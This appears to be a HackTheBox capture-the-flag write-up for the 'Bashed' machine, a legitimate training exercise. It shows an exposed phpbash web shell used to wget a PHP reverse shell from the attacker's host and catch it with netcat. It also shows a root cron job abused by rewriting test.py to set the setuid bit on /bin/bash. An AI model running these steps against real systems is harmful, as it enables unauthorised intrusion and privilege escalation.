Bashed Writeup - HackTheBox
Hello, welcome to the Bashed Writeup from HackTheBox.
Enumeration
NMAP Open ports
In first step, we are going to enumerate the list of open ports with NMAP.
Port 80: HTTP
Whatweb
Apache: 2.4.18
As we can see in the above image, we have a web server running on port 80, so lets take a look.
We found phpbash, seems like its a tool actually developed in this server so lets take a look in github: PHPBash
Phpbash is a standalone, semi-interactive web shell. It’s main purpose is to assist in penetration tests where traditional reverse shells are not possible. The design is based on the default Kali Linux terminal colors, so pentesters should feel right at home.
In this case, i can imagine that we have somewhere a phpbash.php that maybe we can use, so lets use gobuster to enumerate directories. 
After enumerate some directories, we found in /dev two scripts in PHP: 
Lets find out!
Exploitation
Like we saw before, phpbash.php its a web shell, so lets try with wget download a reverse shell in PHP from our machine, in this case i will use PentestMonkey one. PHP Reverse Shell
We open a http server in the same directory as the Reverse Shell:
1
2
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
PHPBash
With wget im going to download the reverse shell from our machine. 
Shell as www-data
Now we start the netcat listener in port 443 and navigate to /uploads/ennove.php (Yes, incredible name for a shell…)
1
2
nc -nlvp 443
listening on [any] 443 ...
After we navigate to /uploads/ennove.php, we got a shell 
Flag user
1
2
3
4
www-data@bashed:/var/www/html/dev$ cat / -name user.txt 2>/dev/null
/home/arrexel/user.txt
www-data@bashed:/var/www/html/dev$ cat /home/arrexel/user.txt
FLAG :D
Privilege Escalation
Shell as scriptmanager
As www-data, lets see our sudo privileges, in this case we can run any command as scriptmanager so lets spawn a bash. 
Shell as root
After enumeration as scriptmanager, we found a folder scripts with a few files.
1
2
3
4
5
6
7
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager
drwxr-xr-x 23 root root
-rw-r--r-- 1 scriptmanager scriptmanager
-rw-r--r-- 1 root root
Lets see the files:
1
2
3
4
5
6
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
testing 123!scriptmanager@bashed:/scripts
As we can see, test.py creates a test.txt and root is the owner but we can modify test.py, so probably who runs the python commands is root, so lets try to get permissions u+s in bash:
Modified test.py
1
2
import os
os.system("chmod u+s /bin/bash")
After that, we try to run test.py, but test.txt is created as scriptmanager owner so maybe root somehow is running test.py (maybe a cronjob?), lets try a script to enumerate process:
1
2
3
4
5
6
7
#!/bin/bash
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon | command | kworker"
old_process=$new_process
done
1
2
3
4
5
6
7
8
9
chmod +x procmon.sh
./procmon.sh
> /usr/sbin/CRON -f
> /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
> python test.py
< /usr/sbin/CRON -f
< /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done
< python test.py
As we can see, > python test.py is being executed in a short period time, so lets wait and watch for permissions changes:
1
scriptmanager@bashed:/scripts$ watch -n 1 ls -la /bin/bash
After 1 minute:
1
2
3
4
scriptmanager@bashed:/scripts$ bash -p
bash-4.3# whoami
root
FLAG :D